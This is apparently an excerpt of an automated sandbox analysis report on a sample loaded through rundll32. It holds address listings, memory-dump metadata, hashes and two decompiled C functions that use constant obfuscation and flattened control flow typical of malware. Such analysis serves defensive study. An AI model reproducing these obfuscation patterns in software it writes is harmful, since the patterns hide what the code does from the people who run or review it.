                                                                                                                      0x002b926f
                                                                                                                      0x002b9277
                                                                                                                      0x002b927f
                                                                                                                      0x002b9287
                                                                                                                      0x002b928f
                                                                                                                      0x002b9297
                                                                                                                      0x002b929f
                                                                                                                      0x002b92a7
                                                                                                                      0x002b92b4
                                                                                                                      0x002b92b8
                                                                                                                      0x002b92c0
                                                                                                                      0x002b92c8
                                                                                                                      0x002b92cd
                                                                                                                      0x002b92d5
                                                                                                                      0x002b92e2
                                                                                                                      0x002b92f4
                                                                                                                      0x002b92f8
                                                                                                                      0x002b9300
                                                                                                                      0x002b9308
                                                                                                                      0x002b930d
                                                                                                                      0x002b9315
                                                                                                                      0x002b9319
                                                                                                                      0x002b9321
                                                                                                                      0x002b9329
                                                                                                                      0x002b9331
                                                                                                                      0x002b9339
                                                                                                                      0x002b9339
                                                                                                                      0x002b933b
                                                                                                                      0x002b933b
                                                                                                                      0x002b9341
                                                                                                                      0x002b9341
                                                                                                                      0x002b9477
                                                                                                                      0x002b947c
                                                                                                                      0x002b9483
                                                                                                                      0x002b948b
                                                                                                                      0x002b9491
                                                                                                                      0x002b9339
                                                                                                                      0x002b9339
                                                                                                                      0x002b9339
                                                                                                                      0x002b933b
                                                                                                                      0x002b933b
                                                                                                                      0x00000000
                                                                                                                      0x002b933b
                                                                                                                      0x002b95b0
                                                                                                                      0x002b95b0
                                                                                                                      0x002b95b0
                                                                                                                      0x002b95bf
                                                                                                                      0x002b95c8
                                                                                                                      0x002b95c8
                                                                                                                      0x002b934d
                                                                                                                      0x002b943f
                                                                                                                      0x002b9444
                                                                                                                      0x002b9457
                                                                                                                      0x002b93e8
                                                                                                                      0x002b93e8
                                                                                                                      0x002b9339
                                                                                                                      0x002b9339
                                                                                                                      0x002b933b
                                                                                                                      0x002b933b
                                                                                                                      0x00000000
                                                                                                                      0x002b933b
                                                                                                                      0x002b9339
                                                                                                                      0x002b9446
                                                                                                                      0x002b9339
                                                                                                                      0x002b9339
                                                                                                                      0x002b933b
                                                                                                                      0x002b933b
                                                                                                                      0x00000000
                                                                                                                      0x002b933b
                                                                                                                      0x00000000
                                                                                                                      0x002b9339
                                                                                                                      0x002b9359
                                                                                                                      0x002b9420
                                                                                                                      0x002b9425
                                                                                                                      0x002b9438
                                                                                                                      0x00000000
                                                                                                                      0x002b9438
                                                                                                                      0x002b9427
                                                                                                                      0x00000000
                                                                                                                      0x002b9427
                                                                                                                      0x002b9365
                                                                                                                      0x002b940e
                                                                                                                      0x002b9413
                                                                                                                      0x002b9416
                                                                                                                      0x00000000
                                                                                                                      0x002b9416
                                                                                                                      0x002b9371
                                                                                                                      0x002b93c9
                                                                                                                      0x002b93ce
                                                                                                                      0x002b93e3
                                                                                                                      0x00000000
                                                                                                                      0x002b93e3
                                                                                                                      0x002b93d0
                                                                                                                      0x00000000
                                                                                                                      0x002b93d0
                                                                                                                      0x002b9379
                                                                                                                      0x002b93b2
                                                                                                                      0x002b93b7
                                                                                                                      0x002b93ba
                                                                                                                      0x002b93bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b93c2
                                                                                                                      0x002b93c2
                                                                                                                      0x00000000
                                                                                                                      0x002b93c2
                                                                                                                      0x002b9381
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b9389
                                                                                                                      0x002b938e
                                                                                                                      0x002b938e
                                                                                                                      0x00000000
                                                                                                                      0x002b9496
                                                                                                                      0x002b9496
                                                                                                                      0x002b949c
                                                                                                                      0x002b9591
                                                                                                                      0x002b9596
                                                                                                                      0x002b95a9
                                                                                                                      0x002b95ae
                                                                                                                      0x00000000
                                                                                                                      0x002b95ae
                                                                                                                      0x002b9598
                                                                                                                      0x00000000
                                                                                                                      0x002b9598
                                                                                                                      0x002b94a2
                                                                                                                      0x002b94a8
                                                                                                                      0x002b9556
                                                                                                                      0x002b9557
                                                                                                                      0x002b955a
                                                                                                                      0x002b9560
                                                                                                                      0x002b9564
                                                                                                                      0x002b9566
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b9573
                                                                                                                      0x002b9578
                                                                                                                      0x002b957f
                                                                                                                      0x002b9589
                                                                                                                      0x00000000
                                                                                                                      0x002b9589
                                                                                                                      0x002b94ae
                                                                                                                      0x002b94b4
                                                                                                                      0x002b9526
                                                                                                                      0x002b952b
                                                                                                                      0x002b9540
                                                                                                                      0x00000000
                                                                                                                      0x002b9540
                                                                                                                      0x002b952d
                                                                                                                      0x00000000
                                                                                                                      0x002b952d
                                                                                                                      0x002b94b6
                                                                                                                      0x002b94bc
                                                                                                                      0x002b950a
                                                                                                                      0x002b950f
                                                                                                                      0x002b951c
                                                                                                                      0x002b951c
                                                                                                                      0x00000000
                                                                                                                      0x002b950f
                                                                                                                      0x002b94be
                                                                                                                      0x002b94c0
                                                                                                                      0x002b94f0
                                                                                                                      0x002b94f6
                                                                                                                      0x002b94fd
                                                                                                                      0x002b94ff
                                                                                                                      0x00000000
                                                                                                                      0x002b94ff
                                                                                                                      0x002b94c2
                                                                                                                      0x002b94c8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b94ce
                                                                                                                      0x002b94d3
                                                                                                                      0x002b94e6
                                                                                                                      0x00000000
                                                                                                                      0x002b94e6
                                                                                                                      0x002b94d5
                                                                                                                      0x002b94d5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0\$Arn$n?
                                                                                                                      • API String ID: 0-1422779782
                                                                                                                      • Opcode ID: 166467aa451e8a9f63ff9014267a9b20bf73d58f2be751d5b273afdc123971c5
                                                                                                                      • Instruction ID: d8b488f79cd7caea563004935d98e46b3de213486e8ade1328229bc461a81e29
                                                                                                                      • Opcode Fuzzy Hash: 166467aa451e8a9f63ff9014267a9b20bf73d58f2be751d5b273afdc123971c5
                                                                                                                      • Instruction Fuzzy Hash: A1B15770528341DBC368CF24C4A95AFBBE1FBC4388F544A1EF686962A0D7719999CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BBD0F Relevance: 4.0, Strings: 3, Instructions: 247COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BBD0F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v16;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t208;
				signed int _t226;
				char* _t228;
				signed int _t229;
				void* _t231;
				signed int _t234;
				intOrPtr _t242;
				intOrPtr* _t247;
				void* _t249;
				intOrPtr _t250;
				void* _t289;
				intOrPtr* _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int* _t301;

				_t291 = _a4;
				_t247 = __ecx;
				_push(_a8);
				_push(_t291);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t208);
				_v132 = 0x7182e5;
				_t301 =  &(( &_v156)[4]);
				_v132 = _v132 + 0x26fa;
				_t289 = 0;
				_t249 = 0xa47caa1;
				_t292 = 0x79;
				_v132 = _v132 / _t292;
				_t293 = 0x16;
				_v132 = _v132 / _t293;
				_v132 = _v132 ^ 0x00000aee;
				_v140 = 0x29ca9c;
				_v140 = _v140 + 0x24a5;
				_v140 = _v140 << 5;
				_v140 = _v140 + 0xffff55cc;
				_v140 = _v140 ^ 0x053d3dfc;
				_v136 = 0x4d5d35;
				_v136 = _v136 | 0x2dd38e58;
				_v136 = _v136 + 0xffffc96a;
				_v136 = _v136 | 0xcd817148;
				_v136 = _v136 ^ 0xedde351d;
				_v152 = 0x709b91;
				_t294 = 0x24;
				_v152 = _v152 / _t294;
				_v152 = _v152 | 0xc56f7625;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x5bd1c7f0;
				_v144 = 0x2195b1;
				_v144 = _v144 | 0x0c2b25b9;
				_v144 = _v144 << 8;
				_v144 = _v144 | 0x32a70c97;
				_v144 = _v144 ^ 0x3bb2e9a3;
				_v120 = 0x3a67b3;
				_v120 = _v120 + 0xffff86f2;
				_v120 = _v120 + 0xf6d6;
				_v120 = _v120 ^ 0x00358b42;
				_v108 = 0x732c66;
				_t68 =  &_v108; // 0x732c66
				_t295 = 0x35;
				_v108 =  *_t68 / _t295;
				_v108 = _v108 << 0xb;
				_v108 = _v108 ^ 0x11669525;
				_v156 = 0x38089d;
				_v156 = _v156 ^ 0x13a0f5b7;
				_v156 = _v156 | 0xc9f1c7ca;
				_v156 = _v156 << 0xf;
				_v156 = _v156 ^ 0xfffe1365;
				_v128 = 0x743938;
				_v128 = _v128 ^ 0xec4d11e9;
				_v128 = _v128 | 0xa250e655;
				_v128 = _v128 * 0x41;
				_v128 = _v128 ^ 0x8cf42415;
				_v100 = 0x6d926d;
				_t296 = 0x34;
				_v100 = _v100 / _t296;
				_v100 = _v100 ^ 0x000eb1c4;
				_v116 = 0xefa621;
				_v116 = _v116 + 0xffff82bb;
				_t297 = 0x3d;
				_v116 = _v116 * 0x32;
				_v116 = _v116 ^ 0x2eb07dcc;
				_v88 = 0x5b377;
				_v88 = _v88 + 0x8d9;
				_v88 = _v88 ^ 0x00067740;
				_v112 = 0x4d19ae;
				_v112 = _v112 ^ 0x630c5599;
				_v112 = _v112 ^ 0xe5b09bfb;
				_v112 = _v112 ^ 0x86f4ef46;
				_v148 = 0x4966c6;
				_v148 = _v148 / _t297;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0x19f6490a;
				_v148 = _v148 ^ 0x19fea643;
				_v104 = 0x4e28a7;
				_v104 = _v104 ^ 0x0c2039e4;
				_t298 = 0x43;
				_v104 = _v104 / _t298;
				_v104 = _v104 ^ 0x002b1fa2;
				_v96 = 0xfd59a6;
				_v96 = _v96 ^ 0x1da99ba6;
				_v96 = _v96 ^ 0x1d58c7ea;
				_v92 = 0x8125dc;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x409d3f45;
				_v124 = 0x45818f;
				_v124 = _v124 ^ 0x2c821393;
				_v124 = _v124 << 0xc;
				_v124 = _v124 + 0x7cf7;
				_v124 = _v124 ^ 0x792e1e67;
				do {
					while(_t249 != 0x4baccf8) {
						if(_t249 == 0x7c30f3d) {
							_t231 = E002C64F1( &_v52, _v156,  &_v16, _v128);
							_pop(_t254);
							if(_t231 != 0) {
								_push(_t254);
								_t242 = E002C3512(_v48);
								 *_t291 = _t242;
								if(_t242 != 0) {
									E002CFD29(_v52, _v112,  *_t291, _v148, _v48);
									_t301 =  &(_t301[3]);
									 *((intOrPtr*)(_t291 + 4)) = _v48;
									_t289 = 1;
								}
							}
							_t249 = 0xf7122fc;
							continue;
						}
						if(_t249 == 0x9cf6742) {
							_t234 = E002D04DE(_v144, _v120,  &_v76,  &_v68, _v108);
							_t301 =  &(_t301[3]);
							asm("sbb ecx, ecx");
							_t249 = ( ~_t234 & 0xf851ec41) + 0xf7122fc;
							continue;
						}
						if(_t249 == 0xa47caa1) {
							_t249 = 0x4baccf8;
							continue;
						}
						if(_t249 == 0xbfbcb36) {
							if(E002CCC89( &_v76,  &_v84, _v152) == 0) {
								L8:
								return _t289;
							}
							_t249 = 0x9cf6742;
							continue;
						}
						if(_t249 != 0xf7122fc) {
							goto L25;
						}
						E002B68DE(_v104, _v96, _v92, _v124, _v76);
						goto L8;
					}
					_t226 =  *((intOrPtr*)(_t247 + 4));
					_t250 =  *_t247;
					_v80 = _t226;
					_v84 = _t250;
					_t228 = _t226 - 1 + _t250;
					while(_t228 > _t250) {
						if( *_t228 == 0) {
							break;
						}
						_t228 = _t228 - 1;
					}
					_t229 = _t228 - _t250;
					_v80 = _t229;
					if(_t229 == 0) {
						L24:
						_t249 = 0xbfbcb36;
						goto L25;
					}
					while(_v80 % _v140 != _v132) {
						_t206 =  &_v80;
						 *_t206 = _v80 - 1;
						if( *_t206 != 0) {
							continue;
						}
						goto L24;
					}
					goto L24;
					L25:
				} while (_t249 != 0x4e0187e);
				goto L8;
			}
















































                                                                                                                      0x002bbd18
                                                                                                                      0x002bbd1f
                                                                                                                      0x002bbd22
                                                                                                                      0x002bbd29
                                                                                                                      0x002bbd2a
                                                                                                                      0x002bbd2b
                                                                                                                      0x002bbd2c
                                                                                                                      0x002bbd31
                                                                                                                      0x002bbd39
                                                                                                                      0x002bbd3c
                                                                                                                      0x002bbd4a
                                                                                                                      0x002bbd4c
                                                                                                                      0x002bbd53
                                                                                                                      0x002bbd58
                                                                                                                      0x002bbd62
                                                                                                                      0x002bbd67
                                                                                                                      0x002bbd6d
                                                                                                                      0x002bbd75
                                                                                                                      0x002bbd7d
                                                                                                                      0x002bbd85
                                                                                                                      0x002bbd8a
                                                                                                                      0x002bbd92
                                                                                                                      0x002bbd9a
                                                                                                                      0x002bbda2
                                                                                                                      0x002bbdaa
                                                                                                                      0x002bbdb2
                                                                                                                      0x002bbdba
                                                                                                                      0x002bbdc2
                                                                                                                      0x002bbdce
                                                                                                                      0x002bbdd3
                                                                                                                      0x002bbdd9
                                                                                                                      0x002bbde1
                                                                                                                      0x002bbde6
                                                                                                                      0x002bbdee
                                                                                                                      0x002bbdf6
                                                                                                                      0x002bbdfe
                                                                                                                      0x002bbe03
                                                                                                                      0x002bbe0b
                                                                                                                      0x002bbe13
                                                                                                                      0x002bbe1b
                                                                                                                      0x002bbe23
                                                                                                                      0x002bbe2b
                                                                                                                      0x002bbe33
                                                                                                                      0x002bbe3b
                                                                                                                      0x002bbe3f
                                                                                                                      0x002bbe42
                                                                                                                      0x002bbe46
                                                                                                                      0x002bbe4b
                                                                                                                      0x002bbe53
                                                                                                                      0x002bbe5b
                                                                                                                      0x002bbe63
                                                                                                                      0x002bbe6b
                                                                                                                      0x002bbe70
                                                                                                                      0x002bbe78
                                                                                                                      0x002bbe80
                                                                                                                      0x002bbe88
                                                                                                                      0x002bbe95
                                                                                                                      0x002bbe99
                                                                                                                      0x002bbea3
                                                                                                                      0x002bbeb1
                                                                                                                      0x002bbeb6
                                                                                                                      0x002bbebc
                                                                                                                      0x002bbec4
                                                                                                                      0x002bbecc
                                                                                                                      0x002bbed9
                                                                                                                      0x002bbedc
                                                                                                                      0x002bbee0
                                                                                                                      0x002bbee8
                                                                                                                      0x002bbef0
                                                                                                                      0x002bbef8
                                                                                                                      0x002bbf00
                                                                                                                      0x002bbf08
                                                                                                                      0x002bbf10
                                                                                                                      0x002bbf18
                                                                                                                      0x002bbf20
                                                                                                                      0x002bbf30
                                                                                                                      0x002bbf34
                                                                                                                      0x002bbf38
                                                                                                                      0x002bbf40
                                                                                                                      0x002bbf48
                                                                                                                      0x002bbf50
                                                                                                                      0x002bbf5c
                                                                                                                      0x002bbf64
                                                                                                                      0x002bbf68
                                                                                                                      0x002bbf70
                                                                                                                      0x002bbf78
                                                                                                                      0x002bbf80
                                                                                                                      0x002bbf88
                                                                                                                      0x002bbf90
                                                                                                                      0x002bbf95
                                                                                                                      0x002bbf9d
                                                                                                                      0x002bbfa5
                                                                                                                      0x002bbfad
                                                                                                                      0x002bbfb2
                                                                                                                      0x002bbfba
                                                                                                                      0x002bbfc2
                                                                                                                      0x002bbfc2
                                                                                                                      0x002bbfd4
                                                                                                                      0x002bc09b
                                                                                                                      0x002bc0a1
                                                                                                                      0x002bc0a4
                                                                                                                      0x002bc0b3
                                                                                                                      0x002bc0bb
                                                                                                                      0x002bc0c0
                                                                                                                      0x002bc0c6
                                                                                                                      0x002bc0dd
                                                                                                                      0x002bc0eb
                                                                                                                      0x002bc0ee
                                                                                                                      0x002bc0f1
                                                                                                                      0x002bc0f1
                                                                                                                      0x002bc0c6
                                                                                                                      0x002bc0f2
                                                                                                                      0x00000000
                                                                                                                      0x002bc0f2
                                                                                                                      0x002bbfe0
                                                                                                                      0x002bc069
                                                                                                                      0x002bc06e
                                                                                                                      0x002bc075
                                                                                                                      0x002bc07d
                                                                                                                      0x00000000
                                                                                                                      0x002bc07d
                                                                                                                      0x002bbfe8
                                                                                                                      0x002bc049
                                                                                                                      0x00000000
                                                                                                                      0x002bc049
                                                                                                                      0x002bbff0
                                                                                                                      0x002bc03d
                                                                                                                      0x002bc016
                                                                                                                      0x002bc022
                                                                                                                      0x002bc022
                                                                                                                      0x002bc03f
                                                                                                                      0x00000000
                                                                                                                      0x002bc03f
                                                                                                                      0x002bbff4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bc00e
                                                                                                                      0x00000000
                                                                                                                      0x002bc013
                                                                                                                      0x002bc0f9
                                                                                                                      0x002bc0fc
                                                                                                                      0x002bc0fe
                                                                                                                      0x002bc103
                                                                                                                      0x002bc107
                                                                                                                      0x002bc111
                                                                                                                      0x002bc10e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bc110
                                                                                                                      0x002bc110
                                                                                                                      0x002bc115
                                                                                                                      0x002bc117
                                                                                                                      0x002bc11b
                                                                                                                      0x002bc135
                                                                                                                      0x002bc135
                                                                                                                      0x00000000
                                                                                                                      0x002bc135
                                                                                                                      0x002bc11d
                                                                                                                      0x002bc12f
                                                                                                                      0x002bc12f
                                                                                                                      0x002bc133
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bc133
                                                                                                                      0x00000000
                                                                                                                      0x002bc13a
                                                                                                                      0x002bc13a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5]M$89t$f,s
                                                                                                                      • API String ID: 0-187558970
                                                                                                                      • Opcode ID: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction ID: 9c769dadf51b7b867526c2dc8020d128757826eb196477cc65141532401e4785
                                                                                                                      • Opcode Fuzzy Hash: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction Fuzzy Hash: 9CB143B15183819FC358CF25C88955BBBF1FBC8398F108A1DF19696260D7B68A98CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B3FB8 Relevance: 4.0, Strings: 3, Instructions: 243COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002B3FB8() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				void* _t262;
				intOrPtr _t274;
				void* _t279;
				intOrPtr _t281;
				intOrPtr _t283;
				signed int _t305;
				signed int _t306;
				signed int* _t309;

				_t309 =  &_v1172;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t279 = 0xa0c284c;
				_v1056 = 0xafe7d9;
				_v1052 = 0x960b65;
				_v1120 = 0x40f49c;
				_v1120 = _v1120 + 0xc807;
				_v1120 = _v1120 * 0x4f;
				_v1120 = _v1120 ^ 0x1446f881;
				_v1116 = 0x6254e6;
				_t305 = 3;
				_v1116 = _v1116 * 5;
				_v1116 = _v1116 + 0xcc41;
				_v1116 = _v1116 ^ 0x01ee9a48;
				_v1104 = 0xc01800;
				_v1104 = _v1104 | 0x48a752a3;
				_v1104 = _v1104 ^ 0x48e65f13;
				_v1128 = 0x7c2fed;
				_v1128 = _v1128 | 0x2c3c97c8;
				_v1128 = _v1128 * 0x77;
				_v1128 = _v1128 ^ 0xadff29d3;
				_v1136 = 0x195939;
				_v1136 = _v1136 + 0xfffffbae;
				_v1136 = _v1136 * 0x49;
				_v1136 = _v1136 ^ 0x073ad8c6;
				_v1168 = 0xbc4bb5;
				_v1168 = _v1168 / _t305;
				_v1168 = _v1168 << 0xd;
				_v1168 = _v1168 ^ 0xd1f3631f;
				_v1168 = _v1168 ^ 0x0980812e;
				_v1084 = 0x2affe9;
				_v1084 = _v1084 >> 0xd;
				_v1084 = _v1084 ^ 0x00075e3f;
				_v1112 = 0x7143ab;
				_v1112 = _v1112 >> 0xb;
				_t306 = 0x4a;
				_v1112 = _v1112 / _t306;
				_v1112 = _v1112 ^ 0x000905fb;
				_v1100 = 0xf39387;
				_v1100 = _v1100 + 0xffffb245;
				_v1100 = _v1100 ^ 0x00f5952a;
				_v1160 = 0xdc501f;
				_v1160 = _v1160 >> 0xb;
				_v1160 = _v1160 | 0xffab4649;
				_v1160 = _v1160 * 0x4a;
				_v1160 = _v1160 ^ 0xe7809492;
				_v1076 = 0x9b6a27;
				_v1076 = _v1076 >> 9;
				_v1076 = _v1076 ^ 0x0000c221;
				_v1132 = 0x7dd85e;
				_v1132 = _v1132 + 0xffff3c07;
				_v1132 = _v1132 ^ 0x5ccf103a;
				_v1132 = _v1132 ^ 0x5cb197cc;
				_v1060 = 0x3a660e;
				_v1060 = _v1060 ^ 0x9c30fae7;
				_v1060 = _v1060 ^ 0x9c0496c9;
				_v1124 = 0xd6fa60;
				_v1124 = _v1124 >> 0xc;
				_v1124 = _v1124 * 0x63;
				_v1124 = _v1124 ^ 0x0000f3a0;
				_v1088 = 0xffa7cd;
				_v1088 = _v1088 ^ 0xcc4f33e8;
				_v1088 = _v1088 ^ 0xccbde027;
				_v1096 = 0xc2302a;
				_v1096 = _v1096 ^ 0x3cf81aba;
				_v1096 = _v1096 ^ 0x3c3bc632;
				_v1064 = 0x2b9d03;
				_v1064 = _v1064 + 0xffffce76;
				_v1064 = _v1064 ^ 0x0029f92b;
				_v1164 = 0x820e56;
				_v1164 = _v1164 >> 0xd;
				_v1164 = _v1164 + 0xa8ad;
				_v1164 = _v1164 | 0xfa0f2dae;
				_v1164 = _v1164 ^ 0xfa046831;
				_v1068 = 0x2883d9;
				_v1068 = _v1068 + 0xffff633a;
				_v1068 = _v1068 ^ 0x0026d05d;
				_v1156 = 0x6f33fd;
				_v1156 = _v1156 << 0xe;
				_v1156 = _v1156 + 0xfcd0;
				_v1156 = _v1156 + 0x75bd;
				_v1156 = _v1156 ^ 0xcd0f8dab;
				_v1172 = 0xb8c1fe;
				_v1172 = _v1172 << 6;
				_v1172 = _v1172 * 0x6a;
				_v1172 = _v1172 << 4;
				_v1172 = _v1172 ^ 0x014ff662;
				_v1148 = 0xbed93a;
				_v1148 = _v1148 * 0x3e;
				_v1148 = _v1148 << 0xa;
				_v1148 = _v1148 ^ 0x5e071c48;
				_v1148 = _v1148 ^ 0xbc7b36e3;
				_v1092 = 0x46d8d3;
				_v1092 = _v1092 << 5;
				_v1092 = _v1092 ^ 0x08d1099a;
				_v1140 = 0x5a5c4c;
				_v1140 = _v1140 ^ 0xa959b0b3;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 ^ 0x481958d7;
				_v1080 = 0xac3d63;
				_v1080 = _v1080 * 0x50;
				_v1080 = _v1080 ^ 0x35d8e2dc;
				_v1152 = 0x840294;
				_v1152 = _v1152 + 0xffff0ee6;
				_v1152 = _v1152 ^ 0xf9fb415c;
				_v1152 = _v1152 | 0x82095beb;
				_v1152 = _v1152 ^ 0xfb725375;
				_v1072 = 0xb67c6d;
				_v1072 = _v1072 + 0xffffc0d8;
				_v1072 = _v1072 ^ 0x00b2e767;
				_v1144 = 0x5c5bd3;
				_v1144 = _v1144 ^ 0x420c1b91;
				_v1144 = _v1144 * 0x79;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 ^ 0x002d898c;
				_v1108 = 0xefd7e6;
				_v1108 = _v1108 * 0x73;
				_v1108 = _v1108 * 0x61;
				_v1108 = _v1108 ^ 0xd2fa3683;
				do {
					while(_t279 != 0x10bc038) {
						if(_t279 == 0x5d7fb4e) {
							E002C41A7();
							L11:
							_t279 = 0x10bc038;
							continue;
						}
						if(_t279 == 0x666e3d5) {
							E002B44FA( &_v520, _v1064, _v1164, _v1068, _v1156);
							_push( &_v1040);
							_push( &_v520);
							_push(_v1092);
							E002B8D95(_v1172, _v1148, __eflags);
							_t309 =  &(_t309[6]);
							_t279 = 0xe0c3523;
							continue;
						}
						if(_t279 == 0x90d07ee) {
							_t274 = E002C04B8();
							goto L11;
						}
						if(_t279 == 0xa0c284c) {
							_t274 =  *0x2d520c; // 0x0
							__eflags =  *((intOrPtr*)(_t274 + 0x438));
							_t279 =  !=  ? 0x90d07ee : 0x5d7fb4e;
							continue;
						}
						if(_t279 != 0xe0c3523) {
							goto L15;
						}
						 *((short*)(E002C4FA8(_v1140,  &_v1040, _v1080, _v1152))) = 0;
						return E002B5B6B(_v1072, _v1144,  &_v1040, _v1108);
					}
					_push(_v1112);
					_push(_v1084);
					_push(0x2b10cc);
					_t262 = E002BAB66(_v1136, _v1168, __eflags);
					_t281 =  *0x2d520c; // 0x0
					_t283 =  *0x2d520c; // 0x0
					__eflags = _t283 + 8;
					E002BE7CE(_t262, _t283 + 8, _v1100, _t283 + 8, _t281 + 0x220, _v1160, _v1076, _v1132, _v1060, _t281 + 0x220);
					E002BAE03(_v1124, _v1088, _v1096, _t262);
					_t309 =  &(_t309[0xd]);
					_t279 = 0x666e3d5;
					L15:
					__eflags = _t279 - 0xfda68b3;
				} while (__eflags != 0);
				return _t274;
			}














































                                                                                                                      0x002b3fb8
                                                                                                                      0x002b3fbe
                                                                                                                      0x002b3fc5
                                                                                                                      0x002b3fcd
                                                                                                                      0x002b3fd2
                                                                                                                      0x002b3fda
                                                                                                                      0x002b3fe2
                                                                                                                      0x002b3fea
                                                                                                                      0x002b3ffb
                                                                                                                      0x002b3fff
                                                                                                                      0x002b4007
                                                                                                                      0x002b4016
                                                                                                                      0x002b4019
                                                                                                                      0x002b401d
                                                                                                                      0x002b4025
                                                                                                                      0x002b402d
                                                                                                                      0x002b4035
                                                                                                                      0x002b403d
                                                                                                                      0x002b4045
                                                                                                                      0x002b404d
                                                                                                                      0x002b405a
                                                                                                                      0x002b405e
                                                                                                                      0x002b4066
                                                                                                                      0x002b406e
                                                                                                                      0x002b407b
                                                                                                                      0x002b407f
                                                                                                                      0x002b4087
                                                                                                                      0x002b4097
                                                                                                                      0x002b409b
                                                                                                                      0x002b40a0
                                                                                                                      0x002b40a8
                                                                                                                      0x002b40b0
                                                                                                                      0x002b40b8
                                                                                                                      0x002b40bd
                                                                                                                      0x002b40c5
                                                                                                                      0x002b40cd
                                                                                                                      0x002b40d6
                                                                                                                      0x002b40d9
                                                                                                                      0x002b40dd
                                                                                                                      0x002b40e5
                                                                                                                      0x002b40ed
                                                                                                                      0x002b40f5
                                                                                                                      0x002b40fd
                                                                                                                      0x002b4105
                                                                                                                      0x002b410a
                                                                                                                      0x002b4117
                                                                                                                      0x002b411b
                                                                                                                      0x002b4123
                                                                                                                      0x002b412b
                                                                                                                      0x002b4130
                                                                                                                      0x002b4138
                                                                                                                      0x002b4140
                                                                                                                      0x002b4148
                                                                                                                      0x002b4150
                                                                                                                      0x002b4158
                                                                                                                      0x002b4163
                                                                                                                      0x002b416e
                                                                                                                      0x002b4179
                                                                                                                      0x002b4181
                                                                                                                      0x002b418b
                                                                                                                      0x002b418f
                                                                                                                      0x002b4197
                                                                                                                      0x002b419f
                                                                                                                      0x002b41a7
                                                                                                                      0x002b41af
                                                                                                                      0x002b41bc
                                                                                                                      0x002b41c9
                                                                                                                      0x002b41d6
                                                                                                                      0x002b41de
                                                                                                                      0x002b41e6
                                                                                                                      0x002b41ee
                                                                                                                      0x002b41f6
                                                                                                                      0x002b41fb
                                                                                                                      0x002b4203
                                                                                                                      0x002b420b
                                                                                                                      0x002b4213
                                                                                                                      0x002b421b
                                                                                                                      0x002b4223
                                                                                                                      0x002b422b
                                                                                                                      0x002b4233
                                                                                                                      0x002b4238
                                                                                                                      0x002b4240
